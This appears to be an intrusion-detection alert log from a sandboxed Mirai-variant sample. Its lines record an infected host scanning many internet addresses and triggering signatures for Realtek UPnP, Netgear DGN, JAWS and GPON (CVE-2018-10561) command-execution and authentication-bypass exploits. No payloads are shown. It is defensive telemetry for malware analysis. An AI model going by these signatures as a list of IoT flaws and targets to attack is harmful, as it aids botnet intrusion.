                                                                        2024-12-06T00:37:16.930411+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358148200.230.30.188080TCP
                                                                        2024-12-06T00:37:16.931155+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359878133.125.92.4849152TCP
                                                                        2024-12-06T00:37:16.931517+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233603026.105.98.7080TCP
                                                                        2024-12-06T00:37:16.931888+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359072189.98.38.22949152TCP
                                                                        2024-12-06T00:37:16.932265+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336370136.136.129.337574TCP
                                                                        2024-12-06T00:37:16.933363+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350988217.144.221.2088080TCP
                                                                        2024-12-06T00:37:16.933733+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235745235.167.30.5852869TCP
                                                                        2024-12-06T00:37:16.934108+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23547526.202.218.8949152TCP
                                                                        2024-12-06T00:37:16.934477+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2340410119.22.161.22152869TCP
                                                                        2024-12-06T00:37:16.934848+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342296204.63.42.895555TCP
                                                                        2024-12-06T00:37:16.935221+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234130878.103.46.15180TCP
                                                                        2024-12-06T00:37:16.935221+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234130878.103.46.15180TCP
                                                                        2024-12-06T00:37:16.935596+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353188167.239.72.5880TCP
                                                                        2024-12-06T00:37:16.937435+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358124115.154.10.1185555TCP
                                                                        2024-12-06T00:37:16.937787+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357308113.173.184.5249152TCP
                                                                        2024-12-06T00:37:16.939282+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2336572113.11.42.7652869TCP
                                                                        2024-12-06T00:37:16.939647+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346678160.212.70.2180TCP
                                                                        2024-12-06T00:37:16.940390+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350802205.52.53.2408080TCP
                                                                        2024-12-06T00:37:16.941128+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344058162.56.247.747574TCP
                                                                        2024-12-06T00:37:16.941492+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233433297.104.12.2980TCP
                                                                        2024-12-06T00:37:16.941866+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344086115.60.230.2135555TCP
                                                                        2024-12-06T00:37:16.942227+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235339896.215.244.8580TCP
                                                                        2024-12-06T00:37:16.943322+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233617822.45.118.25080TCP
                                                                        2024-12-06T00:37:16.944056+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235641895.86.254.13380TCP
                                                                        2024-12-06T00:37:16.944056+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235641895.86.254.13380TCP
                                                                        2024-12-06T00:37:16.944418+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2345448106.46.13.1508080TCP
                                                                        2024-12-06T00:37:16.945519+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233942253.76.178.2980TCP
                                                                        2024-12-06T00:37:16.945519+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233942253.76.178.2980TCP
                                                                        2024-12-06T00:37:16.945899+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358148214.171.62.1947574TCP
                                                                        2024-12-06T00:37:16.946264+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339906115.155.24.235555TCP
                                                                        2024-12-06T00:37:16.946994+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2352340170.10.186.24352869TCP
                                                                        2024-12-06T00:37:16.947353+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23425868.107.105.12080TCP
                                                                        2024-12-06T00:37:16.947727+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234694299.76.48.15880TCP
                                                                        2024-12-06T00:37:16.948839+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2344326180.188.222.16152869TCP
                                                                        2024-12-06T00:37:16.949227+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233583854.118.74.418080TCP
                                                                        2024-12-06T00:37:16.950675+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2340388154.211.50.528080TCP
                                                                        2024-12-06T00:37:16.951424+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234883216.177.230.178080TCP
                                                                        2024-12-06T00:37:16.952526+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233608443.139.176.2188080TCP
                                                                        2024-12-06T00:37:16.953282+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23507704.46.56.4449152TCP
                                                                        2024-12-06T00:37:16.953653+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359614199.92.69.737574TCP
                                                                        2024-12-06T00:37:17.422461+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235309643.79.133.1180TCP
                                                                        2024-12-06T00:37:17.423675+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233937080.180.109.8680TCP
                                                                        2024-12-06T00:37:17.423726+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2351946160.64.200.25080TCP
                                                                        2024-12-06T00:37:17.423846+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2347792152.156.223.1708080TCP
                                                                        2024-12-06T00:37:17.432071+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23462521.98.140.4280TCP
                                                                        2024-12-06T00:37:17.447441+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2335422142.225.53.12980TCP
                                                                        2024-12-06T00:37:17.447672+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338960102.154.96.7880TCP
                                                                        2024-12-06T00:37:17.448820+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234919468.42.36.21080TCP
                                                                        2024-12-06T00:37:17.450754+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2354214174.112.238.1508080TCP
                                                                        2024-12-06T00:37:17.451014+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234493048.71.73.508080TCP
                                                                        2024-12-06T00:37:17.451443+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234992450.191.49.1718080TCP
                                                                        2024-12-06T00:37:17.463294+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2341216212.175.190.2880TCP
                                                                        2024-12-06T00:37:17.463402+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233347646.14.252.19480TCP
                                                                        2024-12-06T00:37:17.464161+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2335532115.248.132.478080TCP
                                                                        2024-12-06T00:37:17.465715+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2354866212.19.173.1918080TCP
                                                                        2024-12-06T00:37:17.467339+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348190150.49.139.12980TCP
                                                                        2024-12-06T00:37:17.469129+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233372422.47.205.19480TCP
                                                                        2024-12-06T00:37:17.469187+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2346456149.193.148.348080TCP
                                                                        2024-12-06T00:37:17.469924+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2336408157.88.62.3580TCP
                                                                        2024-12-06T00:37:17.556351+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234982270.136.186.818080TCP
                                                                        2024-12-06T00:37:17.556540+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348332197.204.137.5880TCP
                                                                        2024-12-06T00:37:17.557471+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233292043.136.192.628080TCP
                                                                        2024-12-06T00:37:17.560263+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233286011.48.182.38080TCP
                                                                        2024-12-06T00:37:17.560799+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235903068.104.71.2438080TCP
                                                                        2024-12-06T00:37:17.561739+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2351940144.80.221.22280TCP
                                                                        2024-12-06T00:37:17.562235+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348828101.130.93.1928080TCP
                                                                        2024-12-06T00:37:17.562615+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235804676.231.140.11580TCP
                                                                        2024-12-06T00:37:17.562934+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233385814.239.128.17080TCP
                                                                        2024-12-06T00:37:17.566643+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235365448.137.212.428080TCP
                                                                        2024-12-06T00:37:17.566738+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2344338189.229.175.1228080TCP
                                                                        2024-12-06T00:37:17.567389+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2333202153.157.254.308080TCP
                                                                        2024-12-06T00:37:17.567989+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235509048.90.206.1698080TCP
                                                                        2024-12-06T00:37:17.568077+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2343626214.111.203.478080TCP
                                                                        2024-12-06T00:37:17.569126+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233787670.159.0.17280TCP
                                                                        2024-12-06T00:37:17.571078+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353304182.227.110.2880TCP
                                                                        2024-12-06T00:37:17.571333+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2344440179.184.84.3480TCP
                                                                        2024-12-06T00:37:17.572323+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235187090.153.54.2448080TCP
                                                                        2024-12-06T00:37:17.573007+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353778162.60.224.628080TCP
                                                                        2024-12-06T00:37:17.573215+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235048673.177.193.22080TCP
                                                                        2024-12-06T00:37:17.573880+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2355692182.149.46.380TCP
                                                                        2024-12-06T00:37:17.574231+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2332856191.77.140.15380TCP
                                                                        2024-12-06T00:37:17.574495+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349890152.96.212.20880TCP
                                                                        2024-12-06T00:37:17.574982+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2334086215.189.147.1008080TCP
                                                                        2024-12-06T00:37:17.925339+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234667446.158.65.385555TCP
                                                                        2024-12-06T00:37:17.926078+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347122106.191.238.16849152TCP
                                                                        2024-12-06T00:37:17.926448+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344486161.247.139.5549152TCP
                                                                        2024-12-06T00:37:17.927195+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2354940181.205.181.13352869TCP
                                                                        2024-12-06T00:37:17.927564+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2358840137.0.42.23852869TCP
                                                                        2024-12-06T00:37:17.928657+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2351896167.99.9.1952869TCP
                                                                        2024-12-06T00:37:17.929034+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236028267.239.51.1380TCP
                                                                        2024-12-06T00:37:17.929034+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236028267.239.51.1380TCP
                                                                        2024-12-06T00:37:17.929404+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235917253.247.144.24780TCP
                                                                        2024-12-06T00:37:17.929404+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235917253.247.144.24780TCP
                                                                        2024-12-06T00:37:17.930506+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23373469.144.121.1028080TCP
                                                                        2024-12-06T00:37:17.930882+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233768625.107.103.68080TCP
                                                                        2024-12-06T00:37:17.931620+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351472218.131.151.14480TCP
                                                                        2024-12-06T00:37:17.931620+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351472218.131.151.14480TCP
                                                                        2024-12-06T00:37:17.931989+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234254653.194.83.14849152TCP
                                                                        2024-12-06T00:37:17.932387+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338588102.194.156.2480TCP
                                                                        2024-12-06T00:37:17.932387+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338588102.194.156.2480TCP
                                                                        2024-12-06T00:37:17.933139+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23541503.123.123.1152869TCP
                                                                        2024-12-06T00:37:17.933875+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354556103.73.217.565555TCP
                                                                        2024-12-06T00:37:17.934219+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351266186.168.207.2525555TCP
                                                                        2024-12-06T00:37:17.934976+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235981046.30.194.24449152TCP
                                                                        2024-12-06T00:37:17.935707+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349620133.45.42.638080TCP
                                                                        2024-12-06T00:37:17.936069+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233626492.188.86.11152869TCP
                                                                        2024-12-06T00:37:17.936440+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23524365.178.52.1485555TCP
                                                                        2024-12-06T00:37:17.936820+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23500905.233.117.12080TCP
                                                                        2024-12-06T00:37:17.937681+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349982104.107.170.19749152TCP
                                                                        2024-12-06T00:37:17.938050+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2356564158.202.203.7452869TCP
                                                                        2024-12-06T00:37:17.939147+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234017625.5.193.19049152TCP
                                                                        2024-12-06T00:37:17.939530+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235551261.94.178.2305555TCP
                                                                        2024-12-06T00:37:17.939889+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340470192.152.41.1938080TCP
                                                                        2024-12-06T00:37:17.940631+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342798171.151.107.15380TCP
                                                                        2024-12-06T00:37:17.941472+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349234106.176.148.3380TCP
                                                                        2024-12-06T00:37:18.894688+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358674161.171.33.415555TCP
                                                                        2024-12-06T00:37:19.604919+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2337220194.163.148.12580TCP
                                                                        2024-12-06T00:37:20.681704+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348762138.35.154.4680TCP
                                                                        2024-12-06T00:37:20.756763+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234197824.69.76.3952869TCP
                                                                        2024-12-06T00:37:20.898897+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2343382135.110.147.14952869TCP
                                                                        2024-12-06T00:37:20.912765+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335610194.236.130.1037574TCP
                                                                        2024-12-06T00:37:20.921404+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235410242.222.208.9680TCP
                                                                        2024-12-06T00:37:20.921404+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235410242.222.208.9680TCP
                                                                        2024-12-06T00:37:26.799947+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341926211.50.44.13649152TCP
                                                                        2024-12-06T00:37:27.837627+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333984115.161.205.1635555TCP
                                                                        2024-12-06T00:37:27.837970+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23366501.22.227.11480TCP
                                                                        2024-12-06T00:37:27.837970+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23366501.22.227.11480TCP
                                                                        2024-12-06T00:37:27.838690+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234373459.239.132.1217574TCP
                                                                        2024-12-06T00:37:27.839052+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233969428.121.234.17180TCP
                                                                        2024-12-06T00:37:27.839771+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334558193.30.177.997574TCP
                                                                        2024-12-06T00:37:27.848889+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2345692153.204.123.988080TCP
                                                                        2024-12-06T00:37:27.856488+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340206220.207.0.3480TCP
                                                                        2024-12-06T00:37:27.856488+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340206220.207.0.3480TCP
                                                                        2024-12-06T00:37:27.866138+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347624186.183.0.1555555TCP
                                                                        2024-12-06T00:37:27.869729+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234879851.253.191.10449152TCP
                                                                        2024-12-06T00:37:27.872626+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356934200.25.215.13380TCP
                                                                        2024-12-06T00:37:27.874803+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234108097.161.172.1348080TCP
                                                                        2024-12-06T00:37:27.891027+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356754198.31.34.1380TCP
                                                                        2024-12-06T00:37:27.891027+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356754198.31.34.1380TCP
                                                                        2024-12-06T00:37:27.898619+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360250197.135.110.128080TCP
                                                                        2024-12-06T00:37:27.918926+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235350440.104.249.14680TCP
                                                                        2024-12-06T00:37:27.918926+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235350440.104.249.14680TCP
                                                                        2024-12-06T00:37:27.922552+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343242136.179.98.22580TCP
                                                                        2024-12-06T00:37:27.924361+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234776694.134.232.20580TCP
                                                                        2024-12-06T00:37:27.927634+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23382723.102.151.22980TCP
                                                                        2024-12-06T00:37:27.927634+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23382723.102.151.22980TCP
                                                                        2024-12-06T00:37:27.945042+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233780279.129.72.16452869TCP
                                                                        2024-12-06T00:37:27.948301+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354280108.221.254.11049152TCP
                                                                        2024-12-06T00:37:27.949030+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23358824.167.46.13880TCP
                                                                        2024-12-06T00:37:27.949385+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235925819.1.163.595555TCP
                                                                        2024-12-06T00:37:27.949748+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234688672.121.179.23580TCP
                                                                        2024-12-06T00:37:27.949748+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234688672.121.179.23580TCP
                                                                        2024-12-06T00:37:28.057014+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2356476203.102.228.878080TCP
                                                                        2024-12-06T00:37:28.119239+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2336132207.54.29.7680TCP
                                                                        2024-12-06T00:37:28.212857+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2358148200.230.30.188080TCP
                                                                        2024-12-06T00:37:28.214386+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2357208103.231.22.138080TCP
                                                                        2024-12-06T00:37:28.214697+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2350988217.144.221.2088080TCP
                                                                        2024-12-06T00:37:28.214821+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2333744158.86.239.378080TCP
                                                                        2024-12-06T00:37:28.216303+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2345958164.50.155.21080TCP
                                                                        2024-12-06T00:37:28.217193+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359802189.65.195.1880TCP
                                                                        2024-12-06T00:37:28.217516+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2350802205.52.53.2408080TCP
                                                                        2024-12-06T00:37:28.219231+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359014132.49.92.2228080TCP
                                                                        2024-12-06T00:37:28.220030+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2333322125.187.103.2508080TCP
                                                                        2024-12-06T00:37:28.220316+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235339896.215.244.8580TCP
                                                                        2024-12-06T00:37:28.221052+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353188167.239.72.5880TCP
                                                                        2024-12-06T00:37:28.221426+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234653496.99.41.1308080TCP
                                                                        2024-12-06T00:37:28.221946+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2346678160.212.70.2180TCP
                                                                        2024-12-06T00:37:28.223379+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233603026.105.98.7080TCP
                                                                        2024-12-06T00:37:28.292407+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234883216.177.230.178080TCP
                                                                        2024-12-06T00:37:28.323092+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235165848.181.195.148080TCP
                                                                        2024-12-06T00:37:28.323255+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234811833.72.49.858080TCP
                                                                        2024-12-06T00:37:28.324302+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234694299.76.48.15880TCP
                                                                        2024-12-06T00:37:28.324639+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2352294197.68.216.10980TCP
                                                                        2024-12-06T00:37:28.345814+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2343258183.178.42.19180TCP
                                                                        2024-12-06T00:37:28.346787+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2348514109.3.50.608080TCP
                                                                        2024-12-06T00:37:28.346982+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2333500140.24.155.938080TCP
                                                                        2024-12-06T00:37:28.348125+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2342800196.223.36.1728080TCP
                                                                        2024-12-06T00:37:28.386081+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2355668156.158.132.22180TCP
                                                                        2024-12-06T00:37:28.386675+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233437478.132.73.22480TCP
                                                                        2024-12-06T00:37:28.431940+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359598102.187.77.1948080TCP
                                                                        2024-12-06T00:37:28.432111+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2354212188.84.47.8380TCP
                                                                        2024-12-06T00:37:28.432715+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233450648.133.51.15580TCP
                                                                        2024-12-06T00:37:28.432984+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338142209.75.120.19880TCP
                                                                        2024-12-06T00:37:28.433635+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235511664.77.154.21980TCP
